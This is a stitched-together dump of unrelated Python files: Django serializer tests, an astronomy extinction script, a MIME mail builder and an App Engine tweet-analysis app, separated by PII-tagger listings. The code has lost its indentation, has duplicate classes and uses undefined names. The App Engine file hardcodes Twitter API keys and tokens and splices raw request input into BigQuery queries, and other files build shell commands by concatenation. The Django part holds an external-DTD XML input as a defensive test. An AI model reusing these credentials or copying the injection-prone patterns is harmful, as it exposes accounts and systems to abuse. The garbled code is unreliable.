# Create all the objects defined in the test data
objects = []
instance_count = {}
for (func, pk, klass, datum) in natural_key_test_data:
with connection.constraint_checks_disabled():
objects.extend(func[0](pk, klass, datum))
# Get a count of the number of objects created for each class
for klass in instance_count:
instance_count[klass] = klass.objects.count()
# Serialize the test database
serialized_data = serializers.serialize(format, objects, indent=2,
use_natural_keys=True)
for obj in serializers.deserialize(format, serialized_data):
obj.save()
# Assert that the deserialized data is the same
# as the original source
for (func, pk, klass, datum) in natural_key_test_data:
func[1](self, pk, klass, datum)
# Assert that the number of objects deserialized is the
# same as the number that was serialized.
for klass, count in instance_count.items():
self.assertEqual(count, klass.objects.count())
def fieldsTest(format, self):
obj = ComplexModel(field1='first', field2='second', field3='third')
obj.save_base(raw=True)
# Serialize then deserialize the test database
serialized_data = serializers.serialize(format, [obj], indent=2, fields=('field1','field3'))
result = next(serializers.deserialize(format, serialized_data))
# Check that the deserialized object contains data in only the serialized fields.
self.assertEqual(result.object.field1, 'first')
self.assertEqual(result.object.field2, '')
self.assertEqual(result.object.field3, 'third')
def streamTest(format, self):
obj = ComplexModel(field1='first',field2='second',field3='third')
obj.save_base(raw=True)
# Serialize the test database to a stream
for stream in (six.StringIO(), HttpResponse()):
serializers.serialize(format, [obj], indent=2, stream=stream)
# Serialize normally for a comparison
string_data = serializers.serialize(format, [obj], indent=2)
# Check that the two are the same
if isinstance(stream, six.StringIO):
self.assertEqual(string_data, stream.getvalue())
else:
self.assertEqual(string_data, stream.content.decode('utf-8'))
for format in serializers.get_serializer_formats():
setattr(SerializerTests, 'test_' + format + '_serializer', curry(serializerTest, format))
setattr(SerializerTests, 'test_' + format + '_natural_key_serializer', curry(naturalKeySerializerTest, format))
setattr(SerializerTests, 'test_' + format + '_serializer_fields', curry(fieldsTest, format))
if format != 'python':
setattr(SerializerTests, 'test_' + format + '_serializer_stream', curry(streamTest, format))
class XmlDeserializerSecurityTests(TestCase):
def test_no_dtd(self):
"""
The XML deserializer shouldn't allow a DTD.
This is the most straightforward way to prevent all entity definitions
and avoid both external entities and entity-expansion attacks.
"""
xml = '<?xml version="1.0" standalone="no"?><!DOCTYPE example SYSTEM "http://example.com/example.dtd">'
with self.assertRaises(DTDForbidden):
next(serializers.deserialize('xml', xml))
| 21,669 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['NRP', 'django.core'], ['PERSON', 'DTDForbidden'], ['LOCATION', 'DecimalData'], ['LOCATION', 'FKData'], ['LOCATION', 'ProxyBaseModel'], ['PERSON', "data['right"], ['NRP', "data['extra"], ['PERSON', 'type(instance.data'], ['PERSON', 'type(instance.data'], ['LOCATION', 'generic_compare(testcase'], ['LOCATION', 'fk_compare(testcase'], ['LOCATION', 'o2o_compare(testcase'], ['LOCATION', 'pk_compare(testcase'], ['PERSON', 'm2m_obj'], ['LOCATION', 'inherited_obj'], ['PERSON', '\\xa5'], ['DATE_TIME', '20'], ['DATE_TIME', '21'], ['DATE_TIME', '30'], ['DATE_TIME', '31'], ['DATE_TIME', '40'], ['DATE_TIME', '41'], ['DATE_TIME', '42'], ['DATE_TIME', '50'], ['DATE_TIME', '51'], ['DATE_TIME', '52'], ['DATE_TIME', '60'], ['DATE_TIME', '61'], ['DATE_TIME', '62'], ['DATE_TIME', '70'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '71'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '72'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '73'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '74'], ['DATE_TIME', '75'], ['DATE_TIME', '76'], ['DATE_TIME', '77'], ['DATE_TIME', '80'], ['DATE_TIME', '123456789'], ['DATE_TIME', '81'], ['DATE_TIME', '82'], ['DATE_TIME', '83'], ['DATE_TIME', '90'], ['DATE_TIME', '91'], ['DATE_TIME', '95'], ['DATE_TIME', '96'], ['DATE_TIME', '101'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['PERSON', 'tag3'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '410'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '440'], ['LOCATION', 'm2m_obj'], ['LOCATION', '441'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '443'], ['LOCATION', 'm2m_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['DATE_TIME', '123456789'], ['LOCATION', '751'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['DATE_TIME', '1100'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['PERSON', "next(serializers.deserialize('xml"], ['URL', 'http://example.com/example.dtd"'], ['URL', 'django.co'], ['URL', 'django.core.se'], ['URL', 'django.core.serializers.ba'], ['URL', 'django.core.se'], ['URL', 'django.ht'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'instance.tags.cr'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'meta.parents.it'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'obj.id'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'data.it'], ['URL', 'testcase.as'], ['URL', 'six.me'], ['URL', 'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'connection.features.int'], ['URL', 'meta.ge'], ['URL', 'connection.features.al'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'cm.exception.ar'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'BaseModel.objects.cr'], ['URL', 'BaseModel.objects.al'], ['URL', 'ProxyBaseModel.objects.al'], ['URL', 'ProxyProxyBaseModel.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'Tag.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'connection.ve'], ['URL', 'six.PY'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'obj.sa'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'obj.sa'], ['URL', 'six.St'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'six.St'], ['URL', 'self.as'], ['URL', 'stream.ge'], ['URL', 'self.as'], ['URL', 'stream.content.de'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de']] |
43 | import threading
def ebv_list(list_submit,list_dict,i,ppid):
import os
lineindex = 0
timehold = time.time()
list_out = []
out = open('/tmp/tmpf_' + str(i) + '_' + str(ppid),'w')
for line in list_submit:
tt = re.split('\s+',line)
ra = float(tt[0])
dec = float(tt[1])
EBV = calc_EBV(float(ra),float(dec),i)
list_out.append(EBV)
#print EBV
lineindex += 1
out.write(str(EBV) + '\n')
if lineindex % 100 == 0:
print 'thread ' + str(i), lineindex, len(list_submit), time.time() - timehold
timehold = time.time()
list_dict[str(i)]['list_out'] = list_out
out.close()
def calc_EBV(coord_in_ra,coord_in_dec,i):
#coord_in_ra='12:51:26.28'
#coord_in_dec='27:07:42.'
coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch='2000') # input needs to be in HOURS as a STRING
g = Galactic(coord, epoch='2000') # output is in degrees not hours--it's latitude/longitude
spt = re.split('\:',str(g.lat))
#print spt, abs(float(spt[0])), float(spt[1])/60.
gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallat
#print g.long
spt = re.split('\:',str(g.long))
#print spt
gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallong
#coordtest = Equatorial(Galactic(g.long,g.lat, epoch='2000'), epoch='2000')
output = commands.getoutput('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y PI:KEY' + str(i) )
spt = re.split('\s',output)
#print spt
EBV = spt[-1]
#print EBV, float(coord_in_ra), float(coord_in_dec)
return EBV
class MyThread ( threading.Thread ):
def __init__ ( self, list_submit,list_dict, i, ppid):
self.i = i
self.list_submit = list_submit
self.list_dict = list_dict
self.ppid = ppid
threading.Thread.__init__(self)
def run ( self ):
ebv_list(self.list_submit,list_dict,self.i,self.ppid)
return
#add E(B-V) to ldac table
import re, commands, sys, bashreader, os
from ephem import *
dict = bashreader.parseFile('progs.ini')
table = sys.argv[1]
import time
tempfile = '/tmp/outkey'
ebvfile = '/tmp/outebv'
os.system('rm ' + ebvfile)
ppid = os.getppid()
print ppid
command = "ldactoasc -b -i " + table + " -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > " + ebvfile
print command
os.system(command)
list = []
import re
outkey=open(tempfile,'w')
lines = open(ebvfile,'r').readlines()
number_interval = 4
length_int = len(lines)/number_interval
start = 0
my_threads = []
list_dict = {}
for i in range(number_interval):
end = start + length_int
if i + 1 == number_interval:
list_submit = lines[start:]
else:
list_submit = lines[start:end]
start = end
list_dict[str(i)] = {'list_submit':list_submit}
#s = MyThread(list_submit,list_dict,i,ppid)
#stat = os.fork()
print i, 'started'
s = os.fork()
if not s:
ebv_list(list_submit,list_dict,i,ppid)
sys.exit()
#s.start()
my_threads.append(s)
print my_threads
#print threading.enumerate()
for s in my_threads:
os.waitpid(s,0)
print 'done'
list_out = []
for i in range(number_interval):
list_out = list_out + list_dict[str(i)]['list_out']
print len(lines), len(list_out)
print lines[0:2], list_out[0:2]
# READ IN COLUMN INFO
for val in list_out:
outkey.write(str(val) + '\n')
outkey.close()
command = "asctoldac -i " + tempfile + " -o " + tempfile + ".cat -c " + dict['photconf'] + "/EBV.conf -t OBJECTS "
os.system(command)
command = "ldacjoinkey -o test -i " + table + " -p " + tempfile + ".cat -t OBJECTS -k EBV"
os.system(command)
| 3,755 | [['PERSON', 'timehold'], ['PERSON', 'ra = float(tt[0'], ['PERSON', 'timehold'], ['LOCATION', 'Equatorial'], ['PERSON', 'gallat'], ['PERSON', 'gallong = float(spt[0'], ['PERSON', 'MyThread'], ['PERSON', 'self.list_dict = list_dict'], ['LOCATION', 'self.i'], ['URL', 'out.cl'], ['URL', 'g.la'], ['URL', 'g.la'], ['URL', 'commands.ge'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'bashreader.pa'], ['URL', 'progs.in'], ['URL', 'sys.ar'], ['URL', 'os.sy'], ['URL', 'os.ge'], ['URL', 'os.sy'], ['URL', 'os.fo'], ['URL', 'os.fo'], ['URL', 's.st'], ['URL', 'outkey.cl'], ['URL', 'EBV.co'], ['URL', 'os.sy'], ['URL', 'os.sy']] |
44 | #coding=utf-8
import smtplib
from datetime import datetime
from hashlib import md5
import sys, re
from .misc import *
from .parts import *
from collections import OrderedDict as odict
class Mimemail():
def __init__(self, **kwargs):
self.headers = odict()
self.headers['MIME-Version'] = '1.0'
self.headers['From'] = MM_DEFAULT_FROM
self.headers['Date'] = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
self.body = ''
self.html = None
self.text = None
self.images = []
self.attachments = []
self.charset = 'UTF-8'
self.recipients = {}
self.from_email = 'root@localhost'
self.kw = kwargs
def set_from(self, from_email, from_name):
self.headers['From'] = '%s <%s>' % (encode_header(from_name, self.charset), from_email)
self.from_email = from_email
def set_html(self, html):
self.html = html
def set_text(self, text):
self.text = text
def add_image(self, image):
self.images.append(image)
def add_attachment(self, att):
self.attachments.append(att)
def set_subject(self, subject):
self.subject = subject
def create_images_part(self, boundary):
lines = []
for image in self.images:
lines.extend([
MM_DEFAULT_CRLF,
'--%s%s' % (boundary, MM_DEFAULT_CRLF),
image.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
image.get_part_body()
])
return ''.join(lines)
def create_attachments_part(self, boundary):
lines = []
for att in self.attachments:
lines.extend([
MM_DEFAULT_CRLF,
'--%s%s' % (boundary, MM_DEFAULT_CRLF),
att.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
att.get_part_body()
])
return ''.join(lines)
def build(self):
has_html = self.html != None
has_text = self.text != None
has_img = len(self.images) > 0
has_att = len(self.attachments) > 0
if has_text and not has_html:
self.html = MimemailPartHtml(re.sub(r'\n', '<br>', self.text.plain_content, re.M | re.S), charset = self.charset)
elif has_html and not has_text:
self.text = MimemailPartText(re.sub(r'<|>|/', '', self.html.plain_content, re.M | re.S | re.U), charset = self.charset)
elif not has_html and not has_text and not has_att:
raise MimemailException('An email has no content to send')
if has_img:
for image in self.images:
src = image.get_file_path()
dst = 'cid:' + image.get_image_cid()
self.html.plain_content = self.html.plain_content.replace(os.path.basename(src), dst)
boundary = 'alt_' + gen_boundary_hash()
self.headers['Content-Type'] = 'multipart/alternative; boundary="' + boundary + '"'
self.body = ''.join([
'--%s%s' % ( boundary, MM_DEFAULT_CRLF ),
self.text.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
self.text.get_part_body(),
'%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF ),
self.html.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
self.html.get_part_body(),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
if has_img:
boundary = 'rel_' + gen_boundary_hash()
self.body = ''.join([
'--%s%s' % ( boundary, MM_DEFAULT_CRLF ),
'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),
self.body,
self.create_images_part(boundary),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
self.headers['Content-Type'] = 'multipart/related; boundary="%s"' % (boundary)
if has_att:
boundary = 'att_' + gen_boundary_hash()
self.body = ''.join([
'--%s%s' % (boundary, MM_DEFAULT_CRLF ),
'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),
self.body,
self.create_attachments_part(boundary),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
self.headers['Content-Type'] = 'multipart/mixed; boundary="%s"' % (boundary)
self.headers['Message-ID'] = self.gen_message_id()
if hasattr(self, 'subject'):
self.headers['Subject'] = encode_header(self.subject, self.charset)
def gen_message_id(self):
return '<%s.%08x@%s>' % (datetime.datetime.now().strftime('%Y%m%d%H%M%S'), random.randint(0, sys.maxint), self.kw.get('host', 'localhost'))
def add_recipient(self, email, name = None):
self.recipients[email] = name if name else email
def send(self):
self.build()
extra_headers = self.get_extra_headers()
for email, name in self.recipients.iteritems():
message = '%s%sTo: %s <%s>%s%s%s' % (extra_headers, MM_DEFAULT_CRLF, encode_header(name, self.charset), email, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF, self.body)
s = smtplib.SMTP(self.kw.get('smtp_relay', '127.0.0.1'))
s.sendmail(self.from_email, email, message)
s.quit()
def get_extra_headers(self):
return MM_DEFAULT_CRLF.join([ '%s: %s' % (k, v) for k,v in self.headers.iteritems() ])
| 5,966 | [['PERSON', 'OrderedDict'], ['PERSON', 'odict'], ['PERSON', 'odict'], ['LOCATION', 'set_from(self'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'self.bo'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.fr'], ['URL', 'self.kw'], ['URL', 'self.ch'], ['URL', 'self.fr'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.su'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.at'], ['URL', 'att.ge'], ['URL', 'att.ge'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ht'], ['URL', 're.su'], ['URL', 'self.text.pl'], ['URL', 'self.ch'], ['URL', 're.su'], ['URL', 'self.html.pl'], ['URL', 'self.ch'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.html.pl'], ['URL', 'self.html.pl'], ['URL', 'content.re'], ['URL', 'os.path.ba'], ['URL', 'self.bo'], ['URL', 'self.text.ge'], ['URL', 'self.text.ge'], ['URL', 'self.html.ge'], ['URL', 'self.html.ge'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.ge'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'datetime.datetime.no'], ['URL', 'sys.ma'], ['URL', 'self.kw.ge'], ['URL', 'self.re'], ['URL', 'self.ge'], ['URL', 'self.recipients.it'], ['URL', 'self.ch'], ['URL', 'self.bo'], ['URL', 'smtplib.SM'], ['URL', 'self.kw.ge'], ['URL', 's.se'], ['URL', 'self.fr'], ['URL', 'CRLF.jo'], ['URL', 'self.headers.it']] |
45 | __author__ = dummy@email.com (J. Matthew Landis)'
import os
import logging
import pickle
import webapp2
import time
import httplib2
import json
import tweepy
import haigha
from collections import Counter
from haigha.connections.rabbit_connection import RabbitConnection
from apiclient import discovery
from oauth2client import appengine
from oauth2client import client
from google.appengine.api import memcache
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.ext.webapp import template
#######################################################################
PROJECTID = '934763316754'
CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json')
# Helpful message to display in the browser if the CLIENT_SECRETS file
# is missing.
MISSING_CLIENT_SECRETS_MESSAGE = """""
<h1>Warning: Please configure OAuth 2.0</h1>
<p>
To make this sample run you will need to populate the client_secrets.json file
found at:
</p>
<p>
<code>%s</code>.
</p>
<p>with information found on the <a
href="https://code.google.com/apis/console">APIs Console</a>.
</p>
""" % CLIENT_SECRETS
http = httplib2.Http(memcache)
service = discovery.build("plus", "v1", http=http)
bigquery_service = discovery.build("bigquery","v2", http=http)
consumer_key = "9xNrmD6hE0xnRSYdZt5t0XT0B"
consumer_secret = "kperqjklvPhBCVvHI96aZIfJu5w1DHI2BZoNMdBEvBPfmuZIYG"
access_token = "46501499-cijYvv9ixtQKHLSiLt9QaRtcmWeEKvvGZK5s6ukw7"
access_token_secret = "D127XCAN02BPb0ZtcreCG6dpBJyiiLCeD6ckS2MgdHqwG"
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/plus.me',
message=MISSING_CLIENT_SECRETS_MESSAGE)
bq_decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/bigquery',
message=MISSING_CLIENT_SECRETS_MESSAGE)
## Function to retrieve and render a template
def render_template(handler, templatename, templatevalues):
path = os.path.join(os.path.dirname(__file__), 'templates/' + templatename)
html = template.render(path, templatevalues)
handler.response.out.write(html)
#######################################################################
## Handles and loads index page
class MainPage(webapp2.RequestHandler):
def get(self):
nickname = "null"
email = "null"
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
nickname = ui.fname+ " " +ui.lname
email = user.email()
login = users.create_login_url('/')
else:
nickname = user.nickname()
email = user.email()
login = '/createProfile'
else:
ui = None
login = users.create_login_url('/')
logout = users.create_logout_url('/')
os.system("python stream.py")
template_values = {
'login': login,
'logout': logout,
'user': user,
'nickname': nickname,
'email': email
}
render_template(self, 'index.html', template_values)
#######################################################################
## Handle user info and profile
class CreateProfile(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
self.redirect('/profile')
else:
template_data = {'logout':users.create_logout_url('/'), 'nickname': users.nickname()}
template_path = 'templates/createProfile.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(user.create_login_url('/'))
#######################################################################
## process user profile
## check for user signed in, if so, save the entered information, otherwise, redirect them to the login page
class ProcessUser(webapp2.RequestHandler) :
def post(self) :
user = users.get_current_user()
if user:
fname = self.request.get('fname')
lname = self.request.get('lname')
fname.replace(" ", "")
lname.replace(" ", "")
words = self.request.get_all('word')
if (not(not fname)) & (not(not lname)):
NewUser = UserModel()
NewUser.uid = user.user_id()
NewUser.fname = fname
NewUser.lname = lname
NewUser.words = []
for word in words:
word.replace(" ", "")
if word:
NewUser.words+=[word]
NewUser.put()
self.redirect('/profile')
else:
self.redirect('/createProfile')
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Model Data
class DataHandler(webapp2.RequestHandler) :
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get("inputData")
queryData = {'query':'SELECT SUM(word_count) as WCount,corpus_date,group_concat(corpus) as Work FROM '
'[publicdata:samples.shakespeare] WHERE word="'+inputData+'" and corpus_date>0 GROUP BY corpus_date ORDER BY WCount'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
resp = []
if 'rows' in dataList:
#parse dataList
for row in dataList['rows']:
for key,dict_list in row.iteritems():
count = dict_list[0]
year = dict_list[1]
corpus = dict_list[2]
resp.append({'count': count['v'],'year':year['v'],'corpus':corpus['v']})
else:
resp.append({'count':'0','year':'0','corpus':'0'})
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps(resp))
else:
self.response.write(json.dumps({'error':'No credentials'}))
#######################################################################
## Model Words
class WordsHandler(webapp2.RequestHandler) :
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get("inputData")
queryData = {'query':'SELECT text FROM '
'[doctor-know:rtda.tweets] WHERE Words CONTAINS "'+inputData+'"GROUP BY text ORDER BY text LIMIT 150'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
resp = {}
resp['text'] = status.text
resp['created_at'] = time.mktime(status.created_at.timetuple())
resp['geo'] = status.geo
resp['source'] = status.source
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps(resp))
else:
self.response.write(json.dumps({'error':'No credentials'}))
#######################################################################
## Model Words
class WordsHandler(webapp2.RequestHandler) :
inputData = "yes"
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get("inputData")
queryData = {'query':'SELECT text FROM '
'[doctor-know:rtda.tweets] WHERE text CONTAINS "'+inputData+'" GROUP BY text ORDER BY text LIMIT 300'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
tweets = []
if 'rows' in dataList:
#parse dataList
count = 0
for row in dataList['rows']:
for key,dict_list in row.iteritems():
tweet = dict_list[0]
count += 1
tweets.append({'text': tweet})
if count == 300:
break
ignore_words = [ "fuck", "shit", "cock", "penis", "porn"]
words = []
for tweet in tweets:
tt = tweet.get('text', "")
for word in tt.split():
if "http" in word:
continue
if word not in ignore_words:
words.append(word)
resp = Counter(words)
resp.headers.add('Access-Control-Allow-Origin', "*")
return resp
# self.response.headers['Content-Type'] = 'application/json'
# self.response.out.write(json.dumps(tweets))
# else:
# self.response.write(json.dumps({'error':'No credentials'}))
#######################################################################
## Profile Page
class ProfilePage(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'firstname': ui.fname, 'lastname': ui.lname, 'words': ui.words, 'nickname': ui.fname+ " " +ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/profile.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect('/createProfile')
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Artificial Creativity Engine
class DisplayEngine(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'nickname': ui.fname+ " " +ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/engine.html'
self.response.out.write(template.render(template_path,template_data))
else:
template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')}
template_path = 'templates/engine.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Data Analysis
class DisplayData(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'nickname': ui.fname+ " " +ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/data.html'
self.response.out.write(template.render(template_path,template_data))
else:
template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')}
template_path = 'templates/data.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Establish/Update User Profile
class UserModel(ndb.Model) :
uid = ndb.StringProperty(indexed=True)
fname = ndb.StringProperty(indexed = False)
lname = ndb.StringProperty(indexed = False)
words = ndb.StringProperty(indexed=False,repeated=True)
#######################################################################
## Establish/Update User Profile
# class CustomStreamListener(tweepy.StreamListener):
# def __init__(self, api):
# self.api = api
# super(tweepy.StreamListener, self).__init__()
# #setup rabbitMQ Connection
# self.connection = RabbitConnection(host='127.0.0.1', heartbeat=None, debug=True)
# self.channel = self.connection.channel()
# #set max queue size
# args = {"x-max-length": 2000}
# self.channel.queue.declare(queue='twitter_topic_feed', arguments=args)
# def on_status(self, status):
# print status.text, "\n"
# data = {}
# data['text'] = status.text
# data['created_at'] = time.mktime(status.created_at.timetuple())
# data['geo'] = status.geo
# data['source'] = status.source
# #queue the tweet
# self.channel.basic.publish(exchange='',
# routing_key='twitter_topic_feed',
# body=json.dumps(data))
# def on_error(self, status_code):
